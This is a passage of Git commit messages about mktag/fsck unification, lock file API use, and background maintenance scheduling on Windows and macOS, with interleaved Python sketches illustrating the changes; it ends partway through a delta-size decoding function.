to the lock file if `fdopen_lock_file()` failed and that this is not a
problem: as documented in lockfile.h, failure to "fdopen" does not roll
back the lock file and we're free to, e.g., query it for its path.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Similar to the previous commits, avoid peeking into the `struct
lock_file`. Use the lock file API instead.
The two functions we're calling here double-check that the tempfile is
indeed "active", which is arguably overkill considering how we took the
lock on the line immediately above. More importantly, this future-proofs
us against, e.g., other code appearing between these two lines or the
lock file and/or tempfile internals changing.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Similar to the previous commit, avoid peeking into the `struct
lock_file`. Use the lock file API instead.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A `struct lock_file` is pretty much just a wrapper around a tempfile.
But it's easy enough to avoid relying on this. Use the wrappers that the
lock file API provides rather than peeking at the temp file or even into
*its* internals.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
p7519 measures the performance of the fsmonitor code. To do this, it
uses the installed copy of Watchman. If Watchman isn't installed, a noop
integration script is installed in its place.
When in the latter mode, it is expected that the script should not write
a "last update token": in fact, it doesn't write anything at all since
the script is blank.
Commit 33226af42b (t/perf/fsmonitor: improve error message if typoing
hook name, 2020-10-26) made sure that running 'git update-index
--fsmonitor' did not write anything to stderr, but this is not the case
when using the empty Watchman script, since Git will complain that:
$ which watchman
watchman not found
$ cat .git/hooks/fsmonitor-empty
$ git -c core.fsmonitor=.git/hooks/fsmonitor-empty update-index --fsmonitor
warning: Empty last update token.
Prior to 33226af42b, the output wasn't checked at all, which allowed
this noop mode to work. But, 33226af42b breaks p7519 when running it
without a 'watchman(1)' on your system.
Handle this by checking that stderr is empty only when running
with a real watchman executable. Otherwise, assert that the error
message is the expected one when running in the noop mode.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Acked-by: Nipunn Koorapati <nipunn@dropbox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Mark the errors mktag might emit for translation. This is a plumbing
command, but the errors it emits are intended to be human-readable.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Convert the "mktag" command to use parse-options.h instead of its own
ad-hoc argc handling. This doesn't matter much in practice since it
doesn't support any options, but removes another special-case in our
codebase, and makes it easier to add options to it in the future.
It does marginally improve the situation for programs that want to
execute git commands in a consistent manner and e.g. always use
--end-of-options. E.g. "gitaly" does that, and has a blacklist of
built-ins that don't support --end-of-options. This is one less
special case for it and other similar programs to support.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change mktag's acceptance rules to accept an empty body without an
empty line after the header again. This fixes an ancient unintended
regression in "mktag".
When "mktag" was introduced in ec4465adb3 (Add "tag" objects that can
be used to sign other objects., 2005-04-25) the input checks were much
looser. When it was documented in 6cfec03680 (mktag: minimally update
the description., 2007-06-10) it was clearly intended for this \n to
be optional:
The message, when [it] exists, is separated by a blank line from
the header.
But then in e0aaf781f6 (mktag.c: improve verification of tagger field
and tests, 2008-03-27) this was made an error, seemingly by
accident. It was just a result of the general header checks, and all
the tests after that patch have a trailing empty line (but did not
before).
Let's allow this again, and tweak the test semantics changed in
e0aaf781f6 to remove the redundant empty line. New tests added in
previous commits of mine already added an explicit test for allowing
the empty line between header and body.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In earlier commits mktag learned to use the fsck machinery, at which
point we needed to add fsck.extraHeaderEntry so it could be as strict
about extra headers as it's been ever since it was implemented.
But it's not nice to need to switch away from "mktag" to "hash-object"
+ manual "fsck" just because you'd like to have an extra header. So
let's support turning it off by getting "fsck.*" variables from the
config.
Pedantically speaking it's still not possible to make "mktag" behave
just like "hash-object -t tag" does, since we're unconditionally going
to check the referenced object in verify_object_in_tag(), which is our
own check, and not one that exists in fsck.c.
But the spirit of "this works like fsck" is preserved, in that if you
created such a tag with "hash-object" and did a full "fsck" on the
repository it would also error out about that invalid object, it just
wouldn't emit the same message as fsck does.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Move the fsck_config() function from builtin/fsck.c to fsck.[ch]. This
allows for re-using it in other tools that expose fsck logic and want
to support its configuration variables.
A logical continuation of this change would be to use a common
function for all of {fetch,receive}.fsck.* and fsck.*. See
5d477a334a (fsck (receive-pack): allow demoting errors to warnings,
2015-06-22) and my own 1362df0d41 (fetch: implement fetch.fsck.*,
2018-07-27) for the relevant code.
However, those routines want to not parse the fsck.skipList into OIDs,
but rather pass them along with the --strict option to another
process. It would be possible to refactor that whole thing so we
support e.g. a "fetch." prefix, then just keep track of the skiplist
as a filename instead of parsing it, and learn to spew that all out
from our internal structures into something we can append to the
--strict option.
But instead I'm planning to re-use this in "mktag", which'll just
re-use these "fsck.*" variables as-is.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the validation logic in "mktag" to use fsck's fsck_tag()
instead of its own custom parser. Curiously the logic for both dates
back to the same commit[1]. Let's unify them so we're not maintaining
two sets of functions to verify that a tag is OK.
The behavior of fsck_tag() and the old "mktag" code being removed here
differs in a few aspects.
I think it makes sense to remove some of those checks, namely:
A. fsck only cares that the timezone matches [-+][0-9]{4}. The mktag
code disallowed values larger than 1400.
Yes there's currently no timezone with a greater offset[2], but
since we allow any number of non-official timezones (e.g. +1234)
passing this through seems fine. Git also won't break in the
future if e.g. French Polynesia decides it needs to outdo the Line
Islands when it comes to timezone extravagance.
B. fsck allows missing author names such as "tagger <email>", mktag
wouldn't, but would allow e.g. "tagger [2 spaces] <email>" (but
not "tagger [1 space] <email>"). Now we allow all of these.
C. Like B, but "mktag" disallowed spaces in the <email> part, fsck
allows it.
In some ways fsck_tag() is stricter than "mktag" was, namely:
D. fsck disallows zero-padded dates, but mktag didn't care. So
e.g. the timestamp "0000000000 +0000" produces an error now. A
test in "t1006-cat-file.sh" relied on this, it's been changed to
use "hash-object" (without fsck) instead.
There was one check I deemed worth keeping by porting it over to
fsck_tag():
E. "mktag" did not allow any custom headers, and by extension (as an
empty commit is allowed) also forbade an extra stray trailing
newline after the headers it knew about.
Add a new check in the "ignore" category to fsck and use it. This
somewhat abuses the facility added in efaba7cc77 (fsck:
optionally ignore specific fsck issues completely, 2015-06-22).
This is somewhat of a hack, but probably the least invasive change
we can make here. The fsck command will shuffle these categories
around, e.g. under --strict the "info" becomes a "warn" and "warn"
becomes "error". Existing users of fsck's (and others,
e.g. index-pack) --strict option rely on this.
So we need to put something into a category that'll be ignored by
all existing users of the API. Pretending that
fsck.extraHeaderEntry=error ("ignore" by default) was set serves
to do this for us.
1. ec4465adb3 (Add "tag" objects that can be used to sign other
objects., 2005-04-25)
2. https://en.wikipedia.org/wiki/List_of_UTC_time_offsets
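Points A and D above can be illustrated with a small Python sketch. The
function names are hypothetical and the checks are simplified readings of
the description in this message, not a port of fsck.c or of the removed
mktag parser.

```python
import re

# Point A: fsck only requires a sign followed by exactly four digits.
TZ_RE = re.compile(r"[-+][0-9]{4}")


def tz_ok_fsck_style(tz: str) -> bool:
    return TZ_RE.fullmatch(tz) is not None


def tz_ok_old_mktag_style(tz: str) -> bool:
    # The old mktag check additionally rejected values larger than 1400.
    return tz_ok_fsck_style(tz) and int(tz[1:]) <= 1400


def is_zero_padded(timestamp: str) -> bool:
    # Point D: a timestamp with leading zeros, such as "0000000000".
    return len(timestamp) > 1 and timestamp.startswith("0")
```

Under these assumptions "+1500" passes the fsck-style check but not the old
mktag-style one, while "0000000000" is flagged as zero-padded and a bare
"0" is not.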
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This introduces no functional change, but refactors the print-out of
the hash at the end to do the same thing with less code.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This minor stylistic churn is usually something we'd avoid, but if we
don't do this then the file after changes in subsequent commits will
only have this minor style inconsistency, so let's change this while
we're at it.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the hardcoded hint of 2^12 to 0. The default strbuf hint is
perfectly fine here, and the only reason we were hardcoding it is
because it survived migration from a pre-strbuf fixed-sized buffer.
See fd17f5b5f7 (Replace all read_fd use with strbuf_read, and get rid
of it., 2007-09-10) for that migration.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add tests to demonstrate what "mktag" does in the face of replaced
objects.
There was an existing test for replaced objects fed to "mktag" added
in cc400f5011 (mktag: call "check_sha1_signature" with the
replacement sha1, 2009-01-23), but that one only tests a
commit->commit mapping, not a mapping to a different type as
we're also testing for here. We could remove the "mktag" test in
t6050-replace.sh now if the created tag wasn't being used by a
subsequent "fsck" test.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The verify_object() function in "mktag.c" is tasked with ensuring that
our tag refers to a valid object.
The existing test for this might fail because it was also testing that
"type taggg" didn't refer to a valid object type (it should be "type
tag"), or because we referred to a valid object but got the type
wrong.
Let's split these tests up, so we're testing all combinations of a
non-existing object and invalid/wrong "type" lines.
We need to provide GIT_TEST_GETTEXT_POISON=false here because the
"invalid object type" error is emitted by
parse_loose_header_extended(), which has that message already marked
for translation. Another option would be to use test_i18ngrep, but I
prefer always running the test, not skipping it under gettext poison
testing.
I'm not testing this in combination with "git replace". That'll be
done in a subsequent commit.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change all the successful "mktag" tests to test that "hash-object"
produces the same hash for the input, and that fsck passes for
both.
This tests e.g. that "mktag" doesn't trim its input or otherwise munge
it in a way that "hash-object" doesn't.
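Why trimming would be visible in the hash can be seen from how an object ID
is computed: the hash covers a "<type> <size>" header, a NUL byte, and then
the exact content bytes. A minimal Python sketch follows; the helper name
and the sample tag payload are made up for illustration.

```python
import hashlib


def git_object_id(obj_type: str, data: bytes, algo: str = "sha1") -> str:
    """Hash "<type> <size>\\0" followed by the raw object content."""
    header = f"{obj_type} {len(data)}\0".encode()
    return hashlib.new(algo, header + data).hexdigest()


# Hypothetical tag payload with a trailing blank line after the body.
tag = (
    b"object e69de29bb2d1d6434b8b29ae775ad8c2e48c5391\n"
    b"type blob\n"
    b"tag mytag\n"
    b"tagger T A Gger <tagger@example.com> 1206478233 -0500\n"
    b"\n"
    b"body\n"
    b"\n"
)

as_given = git_object_id("tag", tag)
trimmed = git_object_id("tag", tag.rstrip(b"\n") + b"\n")
```

Any tool that strips or adds even a single byte ends up with a different
ID, so comparing the IDs from both commands is a cheap way to detect
munging.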
Since we're doing an "fsck --strict" here at the end let's incorporate
the creation of the "mytag" name into this test, removing the
special-case at the end of the file.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add tests for a couple of whitespace edge cases around the header/body
boundary.
I consider the requirement for a blank line before the empty body a
bug, it's a long-standing regression which goes against the command's
documented behavior. This bug will be addressed in a follow-up change.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the last test in the file to run an "fsck --strict" after
creating the tag at the end.
We're just doing this for good measure to check that fsck behaves as
expected now that there's finally a reference for our valid tag. Other
tests are going to be checking this elsewhere, but it's nice to cover all
the edge cases in this test to make it as self-contained as possible.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change a test added in e0aaf781f6 (mktag.c: improve verification of
tagger field and tests, 2008-03-27) to not create "mytag", which
should only be created and verified at the end in an earlier test
added in 446c6faec6 (New tests and en-passant modifications to mktag.,
2006-07-29).
While we're at it let's prevent a similar logic error from creeping
into the test by asserting that "mytag" doesn't exist before we create
it. Let's do this by moving the test to use "update-ref", instead of
our own homebrew ad-hoc refstore update.
We're not really testing for anything yet by creating the tag at the
end here. A subsequent commit will change that.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove the redirection of stderr to "message" in the valid tag
test. This pattern seems to have been copy/pasted from the failure
case in 446c6faec6 (New tests and en-passant modifications to mktag.,
2006-07-29).
While I'm at it do the same for the "replace" tests. The tag creation
I'm changing here seems to have been copy/pasted from the "mktag"
tests to those tests in cc400f5011 (mktag: call
"check_sha1_signature" with the replacement sha1, 2009-01-23).
Nobody examines the contents of the resulting "message" file, so the
net result is that error messages cannot be seen in "sh t3800-mktag.sh
-v" output.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the tests amended in acb49d1cc8 (t3800: make hash-size
independent, 2019-08-18) even more to make them independent of either
SHA-1 or SHA-256.
Some of these tests were failing for the wrong reasons. The first one
being modified here would fail because the line starts with "xxxxxx"
instead of "object"; the rest of the line doesn't matter.
Let's just put a valid hash on the rest of the line anyway to narrow
the test down for just the s/object/xxxxxx/ case.
The second one being modified here would fail under
GIT_TEST_DEFAULT_HASH=sha256 because <some sha-1 length garbage> is an
invalid SHA-256, but we should really be testing <some sha-256 length
garbage> when under SHA-256.
This doesn't really matter since we should be able to trust other
parts of the code to validate things in the 0-9a-f range, but let's
keep it for good measure.
There's a later test which tests an invalid SHA which looks like a
valid one, to stress the "We refuse to tag something we can't
verify[...]" logic in mktag.c.
But here we're testing for a SHA-length string which contains
characters outside of the /[0-9a-f]/i set.
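The distinction between "wrong length" and "right length, wrong characters"
can be sketched in Python as follows. The helper names are hypothetical;
the lengths are the hex sizes of SHA-1 (40) and SHA-256 (64).

```python
import string

HEX_LEN = {"sha1": 40, "sha256": 64}
HEX_DIGITS = set(string.hexdigits)  # 0-9, a-f and A-F


def looks_like_oid(s: str, algo: str) -> bool:
    """True if s has the right length for algo and only hex digits."""
    return len(s) == HEX_LEN[algo] and all(c in HEX_DIGITS for c in s)


def garbage_of_oid_length(algo: str) -> str:
    """A string of the right length made of non-hex characters."""
    return "z" * HEX_LEN[algo]
```

A test that feeds SHA-1-length garbage while running under SHA-256 would
fail on the length alone, so it never exercises the character check; using
garbage of the matching length avoids that.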
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Replace ad-hoc setup of a single commit in the "mktag" tests with our
standard helper pattern. The old setup dated back to 446c6faec6 (New
tests and en-passant modifications to mktag., 2006-07-29) before the
helper existed.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The use of a subshell dates back to e9b20943b7 (t/t3800: do not use a
temporary file to hold expected result., 2008-01-04). It's not needed
anymore, if it ever was.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the mktag documentation to compare itself to the similar
"hash-object -t tag" command. Before this someone reading the
documentation wouldn't have much of an idea what the difference
was.
Let's allude to our own validation logic, and cross-link the "mktag"
and "hash-object" documentation to aid discoverability. A follow-up
change to migrate "mktag" to use "fsck" validation will make the part
about validation logic clearer.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Git's background maintenance uses cron by default, but this is not
available on Windows. Instead, integrate with Task Scheduler.
Tasks can be scheduled using the 'schtasks' command. There are several
command-line options that can allow for some advanced scheduling, but
unfortunately these seem to all require authenticating using a password.
Instead, use the "/xml" option to pass an XML file that contains the
configuration for the necessary schedule. These XML files are based on
some that I exported after constructing a schedule in the Task Scheduler
GUI. These options only run background maintenance when the user is
logged in, and more fields are populated with the current username and
SID at run-time by 'schtasks'.
Since the GIT_TEST_MAINT_SCHEDULER environment variable allows us to
specify 'schtasks' as the scheduler, we can test the Windows-specific
logic on other platforms. Thus, add a check that the XML file written
by Git is valid when xmllint exists on the system.
Since we use a temporary file for the XML files sent to 'schtasks', we
prefix the random characters with the frequency so it is easier to
examine the proper file during tests. Instead of an exact match on the
'args' file, we 'grep' for the arguments other than the filename.
There is a deficiency in the current design. Windows has two kinds of
applications: GUI applications that start by "winmain()" and console
applications that start by "main()". Console applications are attached
to a new Console window if they are not already associated with a GUI
application. This means that every hour the scheduled task launches a
command window for the scheduled tasks. Not only is this visually
obtrusive, but it also takes focus from whatever else the user is
doing!
A simple fix would be to insert a GUI application that acts as a shim
between the scheduled task and Git. This is currently possible in Git
for Windows by setting the <Command> tag equal to
C:\Program Files\Git\git-bash.exe
with options "--hide --no-needs-console --command=cmd\git.exe"
followed by the arguments currently used. Since git-bash.exe is not
included in Windows builds of core Git, I chose to leave out this
feature. My plan is to submit a small patch to Git for Windows that
converts the use of git.exe with this use of git-bash.exe in the
short term. In the long term, we can consider creating this GUI
shim application within core Git, perhaps in contrib/.
Co-authored-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The existing mechanism for scheduling background maintenance is done
through cron. The 'crontab -e' command allows updating the schedule
while cron itself runs those commands. While this is technically
supported by macOS, it has some significant deficiencies:
1. Every run of 'crontab -e' must request elevated privileges through
the user interface. When running 'git maintenance start' from the
Terminal app, it presents a dialog box saying "Terminal.app would
like to administer your computer. Administration can include
modifying passwords, networking, and system settings." This is more
alarming than what we are hoping to achieve. If this alert had some
information about how "git" is trying to run "crontab" then we would
have some reason to believe that this dialog might be fine. However,
it also doesn't help that some scenarios just leave Git waiting for
a response without presenting anything to the user. I experienced
this when executing the command from a Bash terminal view inside
Visual Studio Code.
2. While cron initializes a user environment enough for "git config
--global --show-origin" to show the correct config file information,
it does not set up the environment enough for Git Credential Manager
Core to load credentials during a 'prefetch' task. My prefetches
against private repositories required re-authenticating through UI
pop-ups in a way that should not be required.
The solution is to switch from cron to the Apple-recommended [1]
'launchd' tool.
[1] https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/ScheduledJobs.html
The basics of this tool are that we need to create XML-formatted
"plist" files inside "~/Library/LaunchAgents/" and then use the
'launchctl' tool to make launchd aware of them. The plist files
include all of the scheduling information, along with the command-line
arguments split across an array of <string> tags.
For example, here is my plist file for the weekly scheduled tasks:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
<key>Label</key><string>org.git-scm.git.weekly</string>
<key>ProgramArguments</key>
<array>
<string>/usr/local/libexec/git-core/git</string>
<string>--exec-path=/usr/local/libexec/git-core</string>
<string>for-each-repo</string>
<string>--config=maintenance.repo</string>
<string>maintenance</string>
<string>run</string>
<string>--schedule=weekly</string>
</array>
<key>StartCalendarInterval</key>
<array>
<dict>
<key>Day</key><integer>0</integer>
<key>Hour</key><integer>0</integer>
<key>Minute</key><integer>0</integer>
</dict>
</array>
</dict>
</plist>
The schedules for the daily and hourly tasks are more complicated
since we need to use an array for the StartCalendarInterval with
an entry for each of the six days other than the 0th day (to avoid
colliding with the weekly task), and each of the 23 hours other
than the 0th hour (to avoid colliding with the daily task).
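As a rough illustration of the schedule layout described above, the
following Python sketch builds the StartCalendarInterval arrays for each
frequency and serializes a plist. It is not Git's C implementation: the
function names calendar_intervals() and build_plist() are hypothetical,
and it assumes (based only on the weekly example) that daily entries
fire at hour 0, minute 0 and that hourly entries carry no "Day" key.

```python
import plistlib


def calendar_intervals(frequency):
    """Return StartCalendarInterval entries for a frequency (hypothetical helper)."""
    if frequency == "weekly":
        return [{"Day": 0, "Hour": 0, "Minute": 0}]
    if frequency == "daily":
        # Days 1..6 only; day 0 is left to the weekly task.
        return [{"Day": day, "Hour": 0, "Minute": 0} for day in range(1, 7)]
    if frequency == "hourly":
        # Hours 1..23 only; hour 0 is left to the daily task.
        return [{"Hour": hour, "Minute": 0} for hour in range(1, 24)]
    raise ValueError(f"unknown frequency: {frequency}")


def build_plist(frequency, exec_path="/usr/local/libexec/git-core"):
    """Serialize one plist per frequency; exec_path is copied from the example above."""
    job = {
        "Label": f"org.git-scm.git.{frequency}",
        "ProgramArguments": [
            f"{exec_path}/git",
            f"--exec-path={exec_path}",
            "for-each-repo",
            "--config=maintenance.repo",
            "maintenance",
            "run",
            f"--schedule={frequency}",
        ],
        "StartCalendarInterval": calendar_intervals(frequency),
    }
    return plistlib.dumps(job, sort_keys=False).decode("utf-8")
```

Calling build_plist("daily") yields six <dict> entries in the
StartCalendarInterval array, and build_plist("hourly") yields 23.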
The "Label" value is currently filled with "org.git-scm.git.X"
where X is the frequency. We need a different plist file for each
frequency.
The launchctl command needs to be aligned with a user id in order
to initialize the command environment. This must be done using
the 'launchctl bootstrap' subcommand. This subcommand is new as
of macOS 10.11, which was released in September 2015. Before that
release the 'launchctl load' subcommand was recommended. The best
source of information on this transition I have seen is available
at [2]. The current design does not preclude a future version that
detects the available features of 'launchctl' to use the older
commands. However, it is best to rely on the newest version since
Apple might completely remove the deprecated version on short
notice.
[2] https://babodee.wordpress.com/2016/04/09/launchctl-2-0-syntax/
To remove a schedule, we must run 'launchctl bootout' with a valid
plist file. We also need to 'bootout' a task before the 'bootstrap'
subcommand will succeed, if such a task already exists.
The need for a user id requires us to run 'id -u' which works on
POSIX systems but not Windows. Further, the need for fully-qualified
path names including $HOME behaves differently in the Git internals and
the external test suite. The $HOME variable starts with "C:\..." instead
of the "/c/..." that is provided by Git in these subcommands. The test
therefore has a prerequisite that we are not on Windows. The cross-
platform logic still allows us to test the macOS logic on a Linux
machine.
We can verify the commands that were run by 'git maintenance start'
and 'git maintenance stop' by injecting a script that writes the
command-line arguments into GIT_TEST_MAINT_SCHEDULER.
An earlier version of this patch accidentally had an opening
"<dict>" tag when it should have had a closing "</dict>" tag. This
was caught during manual testing with actual 'launchctl' commands,
but we do not want to update developers' tasks when running tests.
It appears that macOS includes the "xmllint" tool which can verify
the XML format. This is useful for any system that might contain
the tool, so use it whenever it is available.
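The mistake described above (an opening tag where a closing tag was
intended) is a well-formedness error, which any XML parser rejects. The
sketch below uses Python's standard xml.etree.ElementTree module rather
than xmllint, purely for illustration; the helper name is_well_formed()
and the sample snippets are made up for this example and are not part
of the test suite.

```python
import xml.etree.ElementTree as ET


def is_well_formed(xml_text):
    """Return True if xml_text parses as XML, False otherwise."""
    try:
        ET.fromstring(xml_text)
    except ET.ParseError:
        return False
    return True


# A tiny stand-in for a generated plist (illustrative only).
GOOD = '<plist version="1.0"><dict><key>Label</key><string>x</string></dict></plist>'

# Reproduce the class of bug: "<dict>" where "</dict>" was meant.
BAD = GOOD.replace("</dict>", "<dict>")
```

Here is_well_formed(GOOD) is true, while is_well_formed(BAD) is false
because the <dict> elements are never closed.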
We strive to make these tests work on all platforms, but Windows caused
some headaches. In particular, the value of getuid() called by the C
code is not guaranteed to be the same as `$(id -u)` invoked by a test.
This is because `git.exe` is a native Windows program, whereas the
utility programs run by the test script mostly utilize the MSYS2 runtime,
which emulates a POSIX-like environment. Since the purpose of the test
is to check that the input to the hook is well-formed, the actual user
ID is immaterial, thus we can work around the problem by making the
test UID-agnostic. Another subtle issue is the $HOME environment
variable being a Windows-style path instead of a Unix-style path. We can
be more flexible here instead of expecting exact path matches.
Helped-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Co-authored-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When __git_complete was introduced, it was meant to be temporary, while
a proper guideline for public shell functions was established
(tentatively _GIT_complete), but since that never happened, people
in the wild started to use __git_complete, even though it was marked as
not public.
Eight years is more than enough of a wait; let's mark this function as
public, and make it a bit more user-friendly.
So that instead of doing:
__git_complete gk __gitk_main
The user can do:
__git_complete gk gitk
And instead of:
__git_complete gf _git_fetch
Do:
__git_complete gf git_fetch
Backwards compatibility is maintained.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Even though the function was marked as not public, it's already used in
the wild.
We should at least test basic functionality.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
1. We should quote the argument
2. We don't need two redirections
3. A safeguard for arguments (-a) would be good
Suggested-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This makes the code more readable, and also will help when new code
wants to do similar checks.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
If the user specifies a base commit to switch to, check if it actually
references a commit right away to avoid getting confused later on when
it turns out to be an invalid object.
Reported-by: LeSeulArtichaut <leseulartichaut@gmail.com>
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This matches a trace_performance_enter()/trace_performance_leave() pair
added by 0d1ed59 (unpack-trees: add performance tracing, 2018-08-18).
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The unpack_trees() method is quite complicated and its performance can
change dramatically depending on how it is used. We already have some
performance tracing regions, but they have not been updated to the
trace2 API. Do so now.
We already have trace2 regions in unpack_trees.c:clear_ce_flags(), which
uses a linear scan through the index without recursing into trees.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The traverse_trees() method recursively walks through trees, but also
prunes the tree-walk based on a callback. Some callers, such as
unpack_trees(), are quite complicated and can have wildly different
performance between two different commands.
Create constants that count these values and then report the results at
the end of a process. These counts are cumulative across multiple "root"
instances of traverse_trees(), but they provide reproducible values for
demonstrating improvements to the pruning algorithm when possible.
This change is modeled after a similar statistics reporting in 42e50e78
(revision.c: add trace2 stats around Bloom filter usage, 2020-04-06).
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We trace statistics about the effectiveness of changed-path Bloom
filters since 42e50e78 (revision.c: add trace2 stats around Bloom
filter usage, 2020-04-06). Add similar tracing for the topo-walk
algorithm that uses generation numbers to limit the walk size.
This information can help investigate and describe benefits to
heuristics and other changes.
The information that is printed is in JSON format and can be formatted
nicely to present as follows:
{
"count_explort_walked":2603,
"count_indegree_walked":2603,
"count_topo_walked":473
}
Each of these values counts the number of commits visited by each of
the three "stages" of the topo-walk as detailed in b4542418 (revision.c:
generation-based topo-order algorithm, 2018-11-01).
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change all remnants of "sha1" in hash-lookup.c and .h and rename them to
reflect that we're not just able to handle SHA-1 these days.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Rename this function to reflect that we're not just able to handle SHA-1
these days. There are a few instances of "sha1" left in sha1-lookup.[ch]
after this, but those will be addressed in the next commit.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Drop the last remnant of "sha1" in this file and rename it to reflect
that we're not just able to handle SHA-1 these days.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Generalize the last remnants of "sha" and "sha1" in this file and rename
it to reflect that we're not just able to handle SHA-1 these days.
We need to update one test to check for an updated error string.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We document the delta data as a set of instructions, but forget to
document the two sizes that precede those instructions: the size of the
base object and the size of the object to be reconstructed. Fix this
omission.
Rather than cramming all the details about the encoding into the running
text, introduce a separate section detailing our "size encoding" and
refer to it.
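For illustration, here is a minimal Python sketch of reading the two
sizes that precede the delta instructions. It assumes the usual
variable-length scheme: each byte contributes its seven low bits, the
least significant group comes first, and a set high bit means another
byte follows. The function names decode_size() and read_delta_sizes()
are hypothetical, and truncated input is not handled.

```python
def decode_size(data, pos=0):
    """Decode one size starting at data[pos]; return (size, next_pos)."""
    size = 0
    shift = 0
    while True:
        byte = data[pos]
        pos += 1
        # The low seven bits carry payload, least significant group first.
        size |= (byte & 0x7F) << shift
        shift += 7
        # A clear high bit marks the final byte of this size.
        if not byte & 0x80:
            return size, pos


def read_delta_sizes(delta):
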